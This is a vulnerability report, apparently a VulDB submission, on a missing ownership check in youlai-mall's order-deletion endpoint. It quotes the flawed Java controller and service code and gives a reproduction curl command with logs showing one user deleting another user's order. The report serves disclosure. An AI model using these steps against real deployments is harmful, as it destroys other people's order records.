| 标题 | youlai-mall latest Improper Control of Resource Identifiers |
|---|
| 描述 | # youlai-mall improper access control in DELETE /mall-oms/app-api/v1/orders/{orderId} enables horizontal privilege escalation and unauthorized order deletion on victim accounts
## Contributors: Huang Weigang
### 1. Vulnerability Impact
- youlai-mall (latest)
- `https://github.com/youlaitech/youlai-mall`
### 2. Vulnerability Location
- DELETE `/mall-oms/app-api/v1/orders/{orderId}`
### 3. Code Analysis
- File: `mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/controller/app/OrderController.java`
- Route and method:
- `@DeleteMapping("/{orderId}")`
- `public Result<Boolean> deleteOrder(@PathVariable Long orderId) {`
- ` boolean result = orderService.deleteById(orderId);`
- ` return Result.success(result);`
- `}`
- Service: `mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/service/impl/OrderServiceImpl.java`
- `public boolean deleteById(Long orderId) {`
- ` return this.removeById(orderId);`
- `}`
- Issues:
- No ownership check (missing validation that the provided `orderId` belongs to the current logged-in member, e.g., comparing order's `memberId` with `SecurityUtils.getMemberId()`).
- No role/permission control (no `@PreAuthorize`; any authenticated App user can delete arbitrary orders).
- Direct parameter trust (attacker-controlled `orderId` is used directly in database deletion without authorization).
- Supports horizontal privilege escalation (attacker supplies victim's `orderId` and can delete their orders).
- No state validation (missing check for order status; even paid/shipped orders could be deleted).
- Lacks deletion auditing and soft-delete mechanism (hard delete without logging who initiated it).
### Vulnerability Reproduction
-- Preconditions
- Attacker has a valid App login token (`Authorization: Bearer <token>`).
- Victim's `orderId` is known or discoverable (via enumeration, sequential IDs, or other BOLA endpoints).
- Target Endpoint: `DELETE /mall-oms/app-api/v1/orders/{orderId}`
-- Steps (horizontal privilege escalation: delete another user's order)
- Log in as User A (memberId=100) and obtain a valid token.
- Call the endpoint with User B's `orderId` (e.g., orderId=5001):
- `curl -X DELETE -H "Authorization: Bearer <token>" "https://<gateway>/mall-oms/app-api/v1/orders/5001"`
- Observe a 200 OK response, for example:
- `{"code":"00000","data":true,"msg":"一切ok"}`
- Outcome: Without any ownership validation, User A successfully deletes User B's order, causing data loss and business disruption.
-- Example request/response log (reference)
- "data": {
- "request_data": {
- "method": "DELETE",
- "url": "`http://10.15.196.160:9999/mall-oms/app-api/v1/orders/5001`",
- "params": {},
- "json": {},
- "data": {},
- "files": {}
},
- "response_data": {
- "code": "00000",
- "data": true,
- "msg": "一切ok"
}
},
- "test": {
- "request_data": {
- "method": "DELETE",
- "url": "`http://10.15.196.160:9999/mall-oms/app-api/v1/orders/5001`",
- "params": {},
- "json": {},
- "data": {},
- "files": {}
},
- "response_data": {
- "code": "00000",
- "data": true,
- "msg": "一切ok"
}
}
### 4. Impact Description
- Unauthorized data deletion
- Any logged-in user can delete arbitrary orders, causing permanent data loss and business record destruction.
- Horizontal privilege escalation (BOLA/IDOR)
- The `orderId` path parameter is not validated against the authenticated user's identity, allowing cross-account operations.
- Business logic bypass
- Order deletion should respect business rules (e.g., only pending/cancelled orders can be deleted), but this endpoint allows deletion of any order regardless of status.
- Financial and operational impact
- Deleting paid or shipped orders can cause financial discrepancies, inventory mismatches, and fulfillment failures.
- Lack of audit trail and recovery
- Hard delete without logging makes forensic investigation impossible and prevents data recovery.
- Compliance violations
- E-commerce platforms typically require order retention for accounting, tax, and legal purposes; unauthorized deletion violates these requirements.
- Attack chain amplification
- When combined with order enumeration or creation endpoints, attackers can systematically disrupt business operations across multiple accounts.
- System trust erosion
- Users and administrators lose confidence in data integrity and platform reliability, damaging reputation and business continuity.
|
|---|
| 来源 | ⚠️ https://github.com/Hwwg/cve/issues/29 |
|---|
| 用户 | huangweigang (UID 88993) |
|---|
| 提交 | 2025-12-07 07時07分 (6 月前) |
|---|
| 管理 | 2025-12-25 10時50分 (18 days later) |
|---|
| 状态 | 重复 |
|---|
| VulDB条目 | 334476 [youlaitech youlai-mall 1.0.0/2.0.0 /app-api/v1/orders/ orderId 权限提升] |
|---|
| 积分 | 0 |
|---|